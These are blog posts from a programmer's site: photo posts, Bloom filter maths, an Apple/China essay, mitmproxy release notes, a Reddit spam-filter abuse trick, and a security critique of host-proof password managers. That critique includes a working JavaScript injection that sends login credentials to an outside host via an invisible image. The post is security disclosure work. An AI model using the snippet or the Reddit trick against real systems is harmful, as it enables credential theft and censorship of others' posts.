breathtakingly beautiful place to live - I still can't quite believe that I can
get up from my desk, and within 20 minutes be on a deserted beach littered with
lazy sea lions basking in the winter sun.</p>
<p>My advice to you is this: when your life begins to seem a bit stuffy and
constricted, when you begin to feel you've lost sight of something more
fundamental and get the urge to refactor - <em>just do it</em>. There has never been a
better time in history for people who choose to march to a different drum.</p>
<p>To prove what a lucky fellow I am, here are two photos from my walk yesterday
morning - click to view in a lightbox.</p>
<div class="media">
<a href="male-full.jpg">
<img src="male.jpg" />
</a>
</div>
<p>It's not clear from the picture, but this is a massive New Zealand Sea Lion
bull - about 400 kilograms of apparently boneless muscle and blubber.</p>
<div class="media">
<a href="female-full.jpg">
<img src="female.jpg" />
</a>
</div>
<p>It's hard to believe that this sleek female is the same species as the dumpy,
snub-nosed chap above. New Zealand Sea Lions are the rarest species of sea lion
in the world - it's an immense privilege to be able to share a beach with them.</p>
3 Rules of thumb for Bloom Filters
2010-08-25T00:00:00+00:00
2010-08-25T00:00:00+00:00
https://corte.si/posts/code/bloom-filter-rules-of-thumb/
<p>I've spent a few days this week working on a side-project that relies heavily on
Bloom Filters (look for a post on the result of my labours in the next week or
so). If you don't know what a Bloom filter is, <a href="http://en.wikipedia.org/wiki/Bloom_filter">you should probably find
out</a> - they're very neat and have a
<a href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.127.9672&rep=rep1&type=pdf">huge</a>
<a href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.4.3831&rep=rep1&type=pdf">range</a>
of
<a href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.126.2458&rep=rep1&type=pdf">fascinating</a>
<a href="http://www.cs.cmu.edu/%7Edga/papers/fastcache-tr.pdf">applications</a>.</p>
<p>I often need to do rough back-of-the-envelope reasoning about things, and I find
that doing a bit of work to develop an intuition for how a new technique
performs is usually worthwhile. So, here are three broad rules of thumb to
remember when discussing Bloom filters down the pub:</p>
<h3 id="1-one-byte-per-item-in-the-input-set-gives-about-a-2-false-positive-rate">1 - One byte per item in the input set gives about a 2% false positive rate.</h3>
<p>In other words, we can add 1024 elements to a 1KB Bloom Filter, and check for
set membership with about a 2% false positive rate. Nifty. Here are some common
false positive rates and the approximate required bits per element, assuming an
optimal choice of the number of hashes:</p>
<table>
<tr>
<th>fp rate</th> <th>bits</th>
</tr>
<tr>
<td>50%</td> <td>1.44</td>
</tr>
<tr>
<td>10%</td> <td>4.79</td>
</tr>
<tr>
<td>2%</td> <td>8.14</td>
</tr>
<tr>
<td>1%</td> <td>9.58</td>
</tr>
<tr>
<td>0.1%</td> <td>14.38</td>
</tr>
<tr>
<td>0.01%</td> <td>19.17</td>
</tr>
</table>
<p>Graphically, the relation between bits per element and the false positive rate
when using an optimal number of hashes looks like this:</p>
<div class="media">
<a href="graph.png">
<img src="graph.png" />
</a>
<div class="subtitle">
Bits per element vs. false positive probability
</div>
</div>
<h3 id="2-the-optimal-number-of-hash-functions-is-about-0-7-times-the-number-of-bits-per-item">2 - The optimal number of hash functions is about 0.7 times the number of bits per item.</h3>
<p>This means that the number of hashes is "small", varying from about 3 at a 10%
false positive rate, to about 13 at a 0.01% false positive rate.</p>
<h3 id="3-the-number-of-hashes-dominates-performance">3 - The number of hashes dominates performance.</h3>
<p>The number of hashes determines the number of bits that need to be read to test
for membership, the number of bits that need to be written to add an element,
and the amount of computation needed to calculate hashes themselves. We may
sometimes choose to use a less than optimal number of hashes for performance
reasons (especially when we choose to round down when the calculated optimal
number of hashes is fractional).</p>
<h2 id="the-maths">The maths</h2>
<p>Let's do some maths to justify the above, starting with two well-known results
about Bloom filters that can be found in every description of the data
structure. First, by a combinatoric argument we can show that the probability
<strong>p</strong> of a false positive is approximated by the following formula, where <strong>k</strong>
is the number of hash functions, <strong>n</strong> is the size of the input set and <strong>m</strong>
is the size of the Bloom filter in bits:</p>
<div class="media">
<a href="formula-1.png">
<img src="formula-1.png" />
</a>
</div>
<p>Second, we know that <strong>k</strong> is optimal when:</p>
<div class="media">
<a href="formula-2.png">
<img src="formula-2.png" />
</a>
</div>
<p>Notice that in this formula, <strong>m/n</strong> is the number of bits per element in the
Bloom filter. So, the optimal number of hashes grows linearly with the number
of bits per element (<strong>b</strong>):</p>
<div class="media">
<a href="formula-6.png">
<img src="formula-6.png" />
</a>
</div>
<p>Assuming an optimal choice for <strong>k</strong> in the first formula, we get :</p>
<div class="media">
<a href="formula-3.png">
<img src="formula-3.png" />
</a>
</div>
<p>Solving for <strong>m</strong>:</p>
<div class="media">
<a href="formula-4.png">
<img src="formula-4.png" />
</a>
</div>
<p>It's clear from the above that for a given false-positive rate, the number of
bits in a Bloom filter grows linearly with <strong>n</strong>. If we set <strong>n = 1</strong>, we get
the following expression for the approximate number of bits needed per set
element:</p>
<div class="media">
<a href="formula-5.png">
<img src="formula-5.png" />
</a>
</div>
Love and war on Sandfly Beach
2010-08-16T00:00:00+00:00
2010-08-16T00:00:00+00:00
https://corte.si/posts/photos/sandflysealions/
<p>Hiked to the end of <a href="http://en.wikipedia.org/wiki/Sandfly_Bay">Sandfly Bay</a>
today. A strong North-Easter drove streams of fine beach-sand across the dunes,
making it feel like we were wading knee-deep in a swift river of sand. Surreal
and beautiful, but I was too afraid of getting grit into my camera to
photograph the scene.</p>
<p>At the end of the beach, we found two groups of <a href="http://en.wikipedia.org/wiki/New_Zealand_Sea_Lion">New Zealand Sea
Lions</a>. A female basking
with two large cubs, and two young males sparring while a massive mature bull
looked on.</p>
<p>Click to view in full size.</p>
<div class="media">
<a href="sealion_with_cubs_full.jpg">
<img src="sealion_with_cubs.jpg" />
</a>
<div class="subtitle">
Sea lion with cubs
</div>
</div>
<div class="media">
<a href="sparring_sealions_full.jpg">
<img src="sparring_sealions.jpg" />
</a>
<div class="subtitle">
Sparring sea lions
</div>
</div>
sortvis.org
2010-07-14T00:00:00+00:00
2010-07-14T00:00:00+00:00
https://corte.si/posts/visualisation/sortvisdotorg/
<p>I've just put up <a href="http://sortvis.org">sortvis.org</a>, the new official home of the
<a href="http://github.com/cortesi/sortvis">sortvis</a> sorting algorithm visualisation
project. The site has a complete set of up-to-date images, explanations of the
visualisation techniques, code snippets, and a rather snazzy Javascript image
viewer to let you pan and zoom through the huge images produced by the sortvis
<a href="http://sortvis.org/visualisations.html">dense</a> visualisation. Take a look, and
let me know what you think!</p>
Taiaroa Head
2010-05-18T00:00:00+00:00
2010-05-18T00:00:00+00:00
https://corte.si/posts/photos/taiaroa/
<div class="media">
<a href="taiaroa-full.jpg">
<img src="taiaroa.jpg" />
</a>
<div class="subtitle">
Taiaroa head
</div>
</div>
<p>Taken on a stormy day from Aramoana Mole.</p>
Apple, China and the war of ideas
2010-05-07T00:00:00+00:00
2010-05-07T00:00:00+00:00
https://corte.si/posts/politics/apple-is-china/
<p>There was a minor flap recently when <a href="http://www.androidguys.com/2010/04/27/andy-rubin-reacts-steve-jobs-likens-apple-north-korea/">Andy Rubin compared Apple to North
Korea</a>.
Many <a href="http://www.youtube.com/watch?v=lQKdEdzHnfU">turtle-necked Apple hipsters</a>
had their feathers mildly ruffled, and bloggers gleefully reaped a tiny flurry
of page impressions. Quite right too, because Rubin was clearly wrong. Apple is
nothing like North Korea, because <strong>Apple is the China of the tech world</strong>. Lend
me your ears for a minute, while I make a broad-strokes argument for this
statement.</p>
<div class="media">
<a href="mao.jpg">
<img src="mao.jpg" />
</a>
</div>
<p>Not so long ago, the consensus in the West was that political liberty and
capitalism went hand-in-hand. Wherever one arose, the other would inevitably
follow, and in their wake would come prosperity. When China started liberalising
its markets, it seemed self-evident that the rise of capitalism in China would
bring democracy in its wake. The Tiananmen Square protests in 1989 were supposed
to be a sign of things to come, a precursor to wider revolution. The West's
argument was persuasive - it was borne out by a century during which the world
was a roiling cauldron of political and economic experimentation, and nearly
every command economy had failed. Today, the international landscape has changed
entirely. The West has had a catastrophic financial meltdown, and things are
only getting worse. There is a sense that the US-led Western order is in
decline, and the Chinese-led east is rising. China has been the fastest growing
major economy in the world for a decade, and the Communist Party is more firmly
in control than ever. Today, there's no apparent prospect of political reform.
Chinese intellectuals and diplomats are beginning to mount an increasingly
assertive and persuasive argument for a system of government that brings
prosperity without liberty, and dictatorships the world over are listening very,
very carefully.</p>
<p>In the software world, we've also spent decades arguing that freedom and
prosperity go hand in hand. This is the <a href="http://en.wikipedia.org/wiki/Open_source_software#Open_source_software_vs._free_software">"Open
Source"</a>
justification for free software: a pragmatic position that we should have
liberty not for its own sake, but because it produces better outcomes. This is
also the argument behind open hardware platforms, behind open Internet
standards, behind interoperability. Some bloody battles had to be fought with
monopolists, but in the main the last 20 years have been a stunning success for
openness. There has always been a
<a href="http://en.wikipedia.org/wiki/Richard_Stallman">minority</a> who have made a more
fundamental case for liberty, but it's important to recognize that they have
lost the debate. The engine that drives the most important Open Source projects
is entirely based on a superficial utilitarianism - the Googles and IBMs of the
world don't contribute to Open Source because they love liberty, but because the
financial return they get from doing so is greater than their investment. The
fundamental distinction between openness and free-ness hasn't been important so
far, though, because ideology and utilitarian arguments were aligned. Now,
things are changing. No-one can deny that Apple's mobile device strategy has
been a complete slam-dunk. The iPhone is the <a href="http://tech.fortune.cnn.com/2010/03/02/what-doth-it-profit-an-iphone/">most profitable handset out
there</a> by
far, and the iPad is shaping up to be huge. Apple's long-term plan is
breathtakingly ambitious - it's making a play for complete dominance in the
mobile market, with an integrated offering that controls everything from content
to applications to the devices themselves. It's therefore making a play for
total control of the way most people will experience computation in the near
future. Not even the most die-hard free-software hippie can deny that Apple's
success has been won on merit - their devices are simply, unmistakably better
than the competition. Open platforms have been out-classed in almost every
measurable dimension. So, we may be entering the next stage of the computer
revolution with devices where every native application has to be approved by a
single authority, where even programming languages and development tools are
centrally controlled. Apple's competitors and imitators are watching and taking
notes, because far from being punished by the market for this, they have
profited beyond the wildest dreams of avarice.</p>
<p>Apple and China have put pragmatists who also value freedom in a quandary. In
the past, practice and ideology aligned neatly: political liberty and economic
progress went hand in hand, and so did open platforms and commercial success.
There are now powerful counter-examples to this line of thinking, and it seems
clear that making a pragmatic argument for liberty has been a strategic
mis-step both in politics and in technology. Advocates of freedom will have to
turn back to more fundamental arguments: human rights, ethics and morality. We
should recognize that at this point in time, we're losing the war of ideas. I
must admit, in my darker moments I'm pessimistic about our ability to make the
case persuasively to a disengaged public.</p>
<p><strong>PS</strong></p>
<p>To keep this post manageable, I've not talked about factors that muddy the
waters for the technical side of the argument. For instance, I don't think
Microsoft is a counter-example, and neither is Apple's support for open web
standards. I'll save those for a future post. I'd also like to point out that
I'm absolutely not anti-Apple - I own a lot of Apple gear that I use every day.
My position regarding China's place in the world is a caricature of <a href="http://en.wikipedia.org/wiki/Stefan_Halper">Stefan
Halper</a>'s superb book <a href="http://www.amazon.com/Beijing-Consensus-Authoritarian-Dominate-Twenty-First/dp/0465013619/">"The Beijing
Consensus: How China's authoritarian model will dominate the twenty-first
century"</a>.
You can listen to him speaking about this book at the Cato Institute <a href="http://www.cato.org/event.php?eventid=6990">over
here</a>.</p>
Sortvis updates
2010-04-01T00:00:00+00:00
2010-04-01T00:00:00+00:00
https://corte.si/posts/visualisation/sortvis-update/
<div class="media">
<a href="oddevensort.png">
<img src="oddevensort.png" />
</a>
</div>
<p>There have been some improvements to <a href="http://sortvis.org">sortvis</a>!@) - my
sorting algorithm visualisation project - in the last few months. Graphs are now
more balanced, with an equal lead-in and lead-off at the edges. There have also
been a swathe of algorithm contributions - thanks to Aaron Gallagher and Chris
Wong (the image above is of <a href="http://en.wikipedia.org/wiki/Odd-even_sort">Odd-even
Sort</a>, contributed by Aaron). As
usual, you can find the code for all of this on
<a href="http://github.com/cortesi/sortvis">github</a>. I've updated the visualisation page
on my blog with new graphs for all algorithms - go take a look
<a href="http://sortvis.org">here</a>.</p>
<p>I plan to move sortvis and the collection of visualisations onto their own
domain soon. I'm also thinking about making large wall-posters of the
visualisations available. I plan to make some prints for myself, and I'm
assuming that I'm not the only one geeky enough to want a sorting algorithm on
my wall. Would anyone be interested?</p>
mitmproxy 0.2
2010-03-01T00:00:00+00:00
2010-03-01T00:00:00+00:00
https://corte.si/posts/software/mitmproxy0_2/
<p>Just released <a href="http://mitmrpoxy.org">mitmproxy 0.2</a>. Changes include:</p>
<ul>
<li>Big speed and responsiveness improvements, thanks to Thomas Roth</li>
<li>Support urwid 0.9.9</li>
<li>Terminal beeping based on filter expressions</li>
<li>Filter expressions for terminal beeps, limits, interceptions and sticky
cookies can now be passed on the command line.</li>
<li>Save requests and responses to file</li>
<li>Split off non-interactive dump functionality into a new tool called
mitmdump</li>
<li>"A" will now accept all intercepted connections</li>
<li>Lots of bugfixes</li>
</ul>
How to stop a story from appearing on Reddit
2010-02-28T00:00:00+00:00
2010-02-28T00:00:00+00:00
https://corte.si/posts/socialmedia/reddit-story-dos/
<div class="media">
<a href="reddit-story-dos.jpg">
<img src="reddit-story-dos.jpg" />
</a>
</div>
<p>Mallory hates Bob. Bob has a blog about ponies, and Mallory knows that a
large-ish fraction of Bob's traffic comes from the <a href="http://www.reddit.com/r/ponies">ponies
Subreddit</a>. If Bob's stories stopped appearing
there it would make him sad, and Mallory, the venomous little sadist that he
is, would rejoice. Here's how Mallory could accomplish the deed:</p>
<ul>
<li>Watch Bob's blog closely to make sure he's the first to submit Bob's
posts to Reddit.</li>
<li>Include some words that will trigger the spam-filter in the submission
title. Any combination of "viagra" and "cialis" will do just fine.</li>
<li>Sit back and cackle evilly.</li>
</ul>
<p>Now Bob's post is sitting in the spam queue on the ponies Subreddit. Since the
post has already been submitted, the nice users who usually submit Bob's story
can't re-submit it to the same Subreddit. Maybe someone will notice and alert a
moderator, but by the time they un-ban the story nobody cares because it's
already 10 hours old and on page 50 of the /new queue. Bob thinks nobody loves
him, and retires to live out the remainder of his years, sad and lonely, in a
small, unheated hut on a hill outside of town.</p>
<p>In this story, I am Bob, Mallory is some innocent schmuck who submitted my
<a href="https://corte.si/posts/security/hostproof/">last post</a> to the programming Subreddit
while they were silently banned (how were they to know, right?), and the small,
unheated hut is the Aeron chair in front of my desk. The blog about ponies,
however, is entirely fictional.</p>
Host-proof applications: doing it wrong
2010-02-26T00:00:00+00:00
2010-02-26T00:00:00+00:00
https://corte.si/posts/security/hostproof/
<p><b>Please note that the criticism of Clipperz in this post is now out of date -
the Clipperz team is clearly very security-focused, and responded quickly to
address the concerns raised below. </b></p>
<p>Every day I push another bit of my life into the cloud. There was a time when
all my personal data lived on one or two drives I could actually see, touch, and
sniff. Now, I don't even run a personal backup anymore - my software is on
Github, my emails are with Google and the rest of my personal data is spread
evenly between Facebook, Twitter and a handful of online productivity tools. I
do keep redundant checkouts of the important stuff, but that's really just a
side-effect of needing to be able to work off-line. The truth is, my house and
all my gear could sink into the swamp tomorrow, and as long as I have a web
browser and git I'd be back to work the same day. How wonderful...</p>
<p>... but, then again. I think like a devious, malicious cad <a href="http://www.nullcube.com">for a
living</a>, and where one part of me sees convenience,
another sees spooks, privacy violations and unscrupulous monetisation
opportunities. I can't help but feel we got shafted. We were promised a glorious
decentralised future where everyone would be in control of their own data, and
instead our lives have been sliced up and warehoused in a small handful of
all-powerful, opaque silos. The companies running these things all say the same
thing - "Trust us!" - but as data leak follows data leak and privacy violation
follows privacy violation, there has to come a time when users decide that
promises aren't good enough.</p>
<h2 id="host-proof-applications">Host-proof applications</h2>
<p>It turns out that the first tentative steps towards a better way of doing things
have already been taken. The broad goal is simple: to design web applications in
such a way that we don't <em>have</em> to trust the host. Javascript interpreters are
fast enough nowadays to do real-world crypto at reasonable speeds, so we can
encrypt and decrypt data on the client side and store only encrypted data on the
server. The server never sees our encryption keys, and if the implementation is
secure, couldn't access our data even if it tried.</p>
<p>Two groups of people have pioneered this application development style, under
two different names. As far as I can tell, the idea was first articulated in
2005 by <a href="http://smokey.rhs.com/web/blog/PowerOfTheSchwartz.nsf/d6plinks/RSCZ-6C5G54">Richard
Schwartz</a>,
and fleshed out on the ajaxpatterns.org wiki under the name <a href="http://ajaxpatterns.org/Host-Proof_Hosting">host-proof
hosting</a>. Shortly after that,
<a href="http://clipperz.com">Clipperz</a> floated as the first real-world, commercial
implementation of essentially the same idea, but its founders described what
they were building as a <a href="http://www.clipperz.com/users/marco/blog/2007/08/24/anatomy_zero_knowledge_web_application">zero knowledge web
application.</a>
Reading these manifestos carefully, it seems clear that although their emphases
are different, their core aims and principles are identical. It's also pretty
clear that both terms are misnomers. "Zero-knowledge" has a specific
<a href="http://en.wikipedia.org/wiki/Zero-knowledge_proof">cryptographic meaning</a>
that's only peripherally relevant to the broad application design pattern.
What's more, the term is misleading to the layperson, since there's no such
thing as a "zero-knowledge" application, in any real sense. The server
unavoidably knows quite a lot about the client - the address they're connecting
from, how frequently they connect, what operations they're executing, what
browser they're using, and so on. "Host-proof hosting", on the other hand,
assigns the "host-proof" attribute to the wrong end of the pipe. A more accurate
term would be <strong>host-proof application</strong>, and that's how I'm going to refer to
these ideas in the rest of this post.</p>
<p>The pot of gold at the end of this rainbow is to combine the benefits of the
cloud with strong, host-independent data security guarantees. The possibilities
are incredibly enticing. I can imagine a cryptographic Facebook where you don't
need to trust the host to aggregate the entire world's private data in the
clear. I can imagine storing medical records and financial data in the cloud
while still allowing people to maintain direct control over who uses the data
and how. I can imagine a Gmail where everyone uses crypto by default, where
decryption and encryption happens right in the browser. Yes, the technical
obstacles that stand in the way of these dreams are immense, but if we can
surmount them a better world lies beyond.</p>
<h2 id="two-steps-to-shangri-la">Two steps to Shangri-la</h2>
<p>Before we look at some real-world applications, I'd like to briefly talk about
two essential elements of a secure host-proof application: client-side security
and verification. Lets take each of these in turn.</p>
<h3 id="1-client-side-security">1: Client-side security</h3>
<p>Host-proof applications turn the traditional web security model on its head.
Instead of trying to secure the server from the browser, we have to secure the
browser-side application from the server. In fact, we fundamentally <em>don't
care</em> about the server side of the equation - the client-side code should be
secure no matter what combination of malicious skulduggery happens upstream.
Yes, this does mean that a host-proof app's security hinges on the security of
the browser scripting environment, which is undoubtedly one of the most
security-hostile spaces ever devised by the mind of man. Many sensible people
would call it quits right there, but I think we can do a decent job of client
side security with careful thought.</p>
<h3 id="2-verification">2: Verification</h3>
<p>Once we have a secure client-side application, we need to make the tools and
information available to allow users to actually verify that the code running
in their browser is secure. This immediately implies that the client-side of
the application has to be published somewhere independent for peer review.
Perhaps surprisingly, we can also conclude that publishing the server code of a
host-proof application is a distraction. Spending time verifying the security
of the server code is a waste of effort, since we must always assume that the
server has already been compromised, and is actively malicious.</p>
<p>The next step in the verification process is harder. Every time the user visits
a host-proof application, they are getting a blob of potentially malicious data
from the server. It's vital that there be some mechanism that allows the user
to check that the code running in their browser matches the code published for
peer review. One obvious but cumbersome way to do that is to make sure that
your entire application is a single, rolled-up blob, and then to simply publish
a checksum. Although it's a pain in the ass to do, in theory users can
download and verify the application's integrity. In reality, the vast majority
of users won't ever bother use a verification system this cumbersome, and even
those that do won't do so every time. That's not a good reason to give up,
though - making this process workable for users is critical if the host-proof
paradigm is to be viable.</p>
<h2 id="how-to-penetration-test-a-host-proof-application">How to penetration test a host-proof application</h2>
<p>Two characteristic "game-over" scenarios follow immediately from these security
elements. First, we could subvert the verification process to fool the user
into using a corrupted application. Second, we could exploit a security hole in
the client-side application to execute arbitrary code in the browser. If we can
do either of these things, a malicious entity in control of the server could
access a user's private data and have their merry way with it. Which would be
bad. In both these scenarios the server is the attacker - so, where a
traditional web app penetration test often revolves around malicious data sent
by the browser to the server, a host-proof app penetration test focuses on
malicious responses from the server to the browser. Of course, there are a
myriad of other ways in which the security of a host-proof app can fail - but
verification and client-side security are the first two hurdles to cross.</p>
<p>At this point, you might be thinking that a tool that lets you tamper with
server responses before they hit the browser would be damn handy. Tools like
<a href="https://addons.mozilla.org/en-US/firefox/addon/966">TamperData</a> let you modify
outbound requests, but it turns out that extending them to do the same with
inbound data is non-trivial. Not entirely coincidentally, though, I recently
released a little tool called <a href="http://mitmproxy.org">mitmproxy</a> that does
the job just fine. It's an interactive, SSL-capable proxy with a curses
interface that sits between your browser and the server, letting you intercept
and modify requests and responses on the fly.</p>
<p>Let's take mitmproxy for a spin to look at some of the contenders in the
host-proof application space.</p>
<h2 id="clipperz-facepalm">Clipperz: facepalm</h2>
<p>First in line is <a href="http://www.clipperz.com">Clipperz</a>, a project I've been
following for a number of years. The founders - Marco Barulli and Giulio
Cesare Solaroli - were early pioneers of the host-proof application paradigm,
and as far as I know, were the first to try to make a livelihood by
commercialising the idea. To get a flavour for what they're about, I highly
recommend <a href="http://itc.conversationsnetwork.org/shows/detail4283.html">this
interview</a> that Jon
Udell did with Barulli.</p>
<p>Now, lets review the claims that Clipperz makes for itself. Its
<a href="http://www.clipperz.com/about">about</a> page says:</p>
<blockquote>
<p>We got used to trust online services with our data (photos, text documents,
spreadsheets, ...) but Clipperz proves that this is not necessary: users can
enjoy a web based application without the need to trust the web application
provider.</p>
</blockquote>
<p>The <a href="http://www.clipperz.com/support/user_guide">user guide</a> expands on this:</p>
<blockquote>
<p>Clipperz simply hosts your encrypted cards and provide you with a nice
interface to manage your data, but it could never access the cards in their
plain form.</p>
</blockquote>
<p>Well, righty oh! That's a very forthright guarantee. Lets see if Clipperz lives
up to it.</p>
<h3 id="1-verification">1: Verification</h3>
<p>Clipperz takes verification seriously. The entire Clipperz source is
prominently published for review. They also seem to have architected their
application specifically to make checksum verification possible - the
client-side comes down the wire as a single blob, with no external
dependencies. This means that verification really can be as simple as taking a
checksum over the application page. They even have <a href="http://www.clipperz.com/reviewing_the_code/checksums">instructions that show how
to do this using wget</a>.</p>
<p>There are two important criticisms of the Clipperz verification process. Most
critically, they publish the checksums and verification package right on the
Clipperz homepage. If we assume that the server has been compromised, the
attacker is in control of both the checksums and the app, and we're up the
creek. Secondly, although Clipperz has gone to a lot of effort to make the
process easy, verification is still too cumbersome. The vast majority of their
users will never bother to verify their client-side at all. Some more
innovation is needed from an already very innovative company to make this
process simpler.</p>
<p>All told, though, this is a good effort - with a little bit of extra work,
Clipperz would get a definite "pass" for verification.</p>
<h3 id="2-client-side-security">2: Client-side security</h3>
<p>Client-side security is a different story. The moment we look at the traffic
between the client and server, it's immediately clear that something is very,
very wrong. Here's a sample of what comes down the pipe to the client:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">throw </span><span style="color:#c0c5ce;">'</span><span style="color:#a3be8c;">allowScriptTagRemoting is false.</span><span style="color:#c0c5ce;">';
</span><span style="color:#65737e;">//#DWR-INSERT
//#DWR-REPLY
</span><span style="color:#b48ead;">var </span><span style="color:#bf616a;">s0</span><span style="color:#c0c5ce;">={};</span><span style="color:#b48ead;">var </span><span style="color:#bf616a;">s1</span><span style="color:#c0c5ce;">={};</span><span style="color:#bf616a;">s0</span><span style="color:#c0c5ce;">.result="</span><span style="color:#a3be8c;">done</span><span style="color:#c0c5ce;">";</span><span style="color:#bf616a;">s0</span><span style="color:#c0c5ce;">.lock="</span><span style="color:#a3be8c;">4EB1C567-7FFE-928D-E0C8-11AF8870DE57</span><span style="color:#c0c5ce;">";
</span><span style="color:#bf616a;">s1</span><span style="color:#c0c5ce;">.requestType="</span><span style="color:#a3be8c;">MESSAGE</span><span style="color:#c0c5ce;">";</span><span style="color:#bf616a;">s1</span><span style="color:#c0c5ce;">.targetValue="</span><span style="color:#a3be8c;">blahblah</span><span style="color:#c0c5ce;">";</span><span style="color:#bf616a;">s1</span><span style="color:#c0c5ce;">.cost=</span><span style="color:#d08770;">2</span><span style="color:#c0c5ce;">;
</span><span style="color:#bf616a;">dwr</span><span style="color:#c0c5ce;">.engine.</span><span style="color:#bf616a;">_remoteHandleCallback</span><span style="color:#c0c5ce;">('</span><span style="color:#a3be8c;">5</span><span style="color:#c0c5ce;">','</span><span style="color:#a3be8c;">0</span><span style="color:#c0c5ce;">',{result:</span><span style="color:#bf616a;">s0</span><span style="color:#c0c5ce;">,toll:</span><span style="color:#bf616a;">s1</span><span style="color:#c0c5ce;">});
</span></code></pre>
<p>Don't let the <strong>throw</strong> at the top of the snippet fool you. That gets stripped
off by the client-side code, and the remainder of the snippet is then run by
the client-side application. Yes, folks: Clipperz uses
<a href="http://directwebremoting.org/dwr/index.html">DWR</a>, which means that the
Clipperz server sends little chunks of Javascript back to the browser, which
are then eval-ed in the password manager's context. This means that the
application is <em>designed</em> to let the supposedly untrusted server execute
arbitrary code in the secure environment that contains your S00P3R S3KR3T data.
So all their work to make their application verifiable and all the effort
expended to publish their code for review is worth exactly bupkis.</p>
<p>Facepalm.</p>
<p>To prove that this isn't an academic issue, here's a trivial exploit showing
how someone in control of the Clipperz server could access a user's private
data even if they went to the effort of verifying the application checksum.
<strong>WARNING:</strong> Doing this using your real Clipperz credentials will make your
username and password appear in my webserver logs! If you're following along
with mitmproxy, you need to set an intercept on responses from Clipperz ("i"
for intercept, and use the pattern "~s ~u clipperz"). And then add the
following lines of code to the first server response after you click the
"login" button, just below the "#DWR-REPLY" marker:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">var </span><span style="color:#bf616a;">f </span><span style="color:#c0c5ce;">= </span><span style="color:#bf616a;">getElementsByTagAndClassName</span><span style="color:#c0c5ce;">("</span><span style="color:#a3be8c;">input</span><span style="color:#c0c5ce;">", "</span><span style="color:#a3be8c;">loginFormField</span><span style="color:#c0c5ce;">");
</span><span style="color:#b48ead;">var </span><span style="color:#bf616a;">s </span><span style="color:#c0c5ce;">= "</span><span style="color:#a3be8c;">http://corte.si/sploit/</span><span style="color:#c0c5ce;">";
</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">(</span><span style="color:#b48ead;">var </span><span style="color:#bf616a;">i</span><span style="color:#c0c5ce;">=</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">; </span><span style="color:#bf616a;">i </span><span style="color:#c0c5ce;">< </span><span style="color:#bf616a;">f</span><span style="color:#c0c5ce;">.length; </span><span style="color:#bf616a;">i</span><span style="color:#c0c5ce;">++){</span><span style="color:#bf616a;">s </span><span style="color:#c0c5ce;">= </span><span style="color:#bf616a;">s </span><span style="color:#c0c5ce;">+ </span><span style="color:#bf616a;">f</span><span style="color:#c0c5ce;">[</span><span style="color:#bf616a;">i</span><span style="color:#c0c5ce;">].value + "</span><span style="color:#a3be8c;">::</span><span style="color:#c0c5ce;">";}
</span><span style="color:#b48ead;">var </span><span style="color:#bf616a;">e </span><span style="color:#c0c5ce;">= </span><span style="color:#bf616a;">IMG</span><span style="color:#c0c5ce;">({"</span><span style="color:#a3be8c;">src</span><span style="color:#c0c5ce;">": </span><span style="color:#bf616a;">s</span><span style="color:#c0c5ce;">, "</span><span style="color:#a3be8c;">height</span><span style="color:#c0c5ce;">": "</span><span style="color:#a3be8c;">0px</span><span style="color:#c0c5ce;">", "</span><span style="color:#a3be8c;">width</span><span style="color:#c0c5ce;">": "</span><span style="color:#a3be8c;">0px</span><span style="color:#c0c5ce;">"});
</span><span style="color:#bf616a;">appendChildNodes</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">$</span><span style="color:#c0c5ce;">("</span><span style="color:#a3be8c;">header</span><span style="color:#c0c5ce;">"), </span><span style="color:#bf616a;">e</span><span style="color:#c0c5ce;">);
</span></code></pre>
<p>This rough and ready snippet simply adds an invisible image tag to the page,
which loads a bogus image that includes the username and password in the source
path. Image sources aren't constrained by the same origin policy, so we can
send this data wherever we like - in this case, the server my blog is hosted
on. The login process will continue as usual, and unless the user is watching
their network traffic carefully, they'll be none the wiser.</p>
<h2 id="don-t-worry-clipperz-passpack-does-it-wrong-too">Don't worry Clipperz, Passpack does it wrong too</h2>
<p>The other big contender in the host-proof application space is Clipperz'
slicker-looking rival, <a href="http://www.passpack.com">Passpack</a>. A glance at their
security page shows that they definitely refer to themselves as applying the
"host-proof hosting" pattern. Their <a href="https://www.passpack.com/en/faq/">FAQ</a>
makes the typical strong security claim:</p>
<blockquote>
<p><strong>Can Passpack read my passwords?</strong></p>
<p>Not even if we wanted to. It's not possible.</p>
</blockquote>
<p>Not possible, eh? Well, lets see.</p>
<h3 id="1-verification-1">1: Verification</h3>
<p>Passpack has completely punted on the verification issue. They don't publish
any checksums, they don't publish their source, and their application is split
up into innumerable components that would make verification a nightmare. In a
blog post <a href="http://blog.passpack.com/2007/04/passpack-and-clipperz-the-difference">comparing themselves with
Clipperz</a>,
they make clear that this is a conscious choice on their part, not an
oversight. In fact, they level the same criticism at the Clipperz verification
process that I do. Clipperz publishes their verification package right on their
homepage:</p>
<blockquote>
<p>However, if I am in a phished version of Clipperz, it's a moot point because
the phisherman can falsify those values as well so that they match his
spoofed version.</p>
</blockquote>
<p>This misses the point of the checksum somewhat - we're not trying to protect
against phishing, but against a malicious server - but the criticism is valid
none the less. Passpack is also right that the Clipperz checksum verification
process is too cumbersome:</p>
<blockquote>
<p>I just don't think anyone would really do that - always, every single time,
many times a day.</p>
</blockquote>
<p>Quite so. But instead of trying compete with Clipperz by doing a better job on
these points, Passpack gave up - they only publish a checksum for the offline
version of their application. This is a disastrous decision. Passpack users are
compelled to execute whatever the server passes them, without any verification
or review. If this was a sudden-death match, that would be Passpack pretty
much done right there.</p>
<h3 id="2-client-side-security-1">2: Client-side security</h3>
<p>But even if they <em>did</em> have a verification mechanism, it still wouldn't help.
Firing up mitmproxy, our first look at the traffic seems promising. During the
login process we see JSON snippets - which can be deserialized safely - being
passed to and fro, rather than chunks of Javascript. Then we notice that the
news pane comes through as a chunk of HTML. When we edit the response to add a
<script> tag, it gets executed. Furthermore, when we click on any of the
menu buttons, gobs of Javascript are pumped into the client app and merrily
evaluated. I stopped looking at the application at this point. There's no point
showing an example of how someone in control of the server could exploit this
situation, because it's clear that preventing script injection is simply not a
